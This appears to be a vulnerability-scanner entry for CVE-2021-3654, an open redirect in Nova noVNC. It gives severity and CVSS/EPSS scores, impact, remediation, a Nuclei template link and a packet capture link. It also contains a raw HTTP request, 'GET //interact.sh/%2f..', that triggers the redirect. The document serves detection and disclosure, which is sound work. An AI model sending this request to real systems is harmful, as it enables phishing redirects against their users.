| Title | Nova noVNC - Open Redirect |
|---|---|
| Author | geeknik |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix the open redirect vulnerability in the Nova noVNC application. |
| CVSS Score | 6.1 |
| EPSS Score | 0.88336 |
| CVE ID | CVE-2021-3654 |
| CWE ID | CWE-601 |
| Tags | cve2021 cve redirect novnc seclists openstack vuln |
Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
GET //interact.sh/%2f.. HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3654.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-3654.pcap
N/AN/A